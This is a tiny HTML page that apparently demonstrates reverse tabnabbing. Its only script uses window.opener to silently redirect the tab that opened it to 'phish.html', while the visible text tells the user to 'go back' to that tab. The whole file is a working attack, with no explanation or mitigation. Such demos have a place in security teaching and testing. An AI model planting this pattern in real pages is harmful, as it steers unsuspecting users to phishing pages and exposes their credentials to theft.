<!DOCTYPE html>
<html>
<head>
<title>Redirect-er page</title>
</head>
<body>

<h1>Something's waiting for you, go back</h1>

<script>
if (window.opener) {
  window.opener.location="phish.html";
}

</script>
</body>
</html>
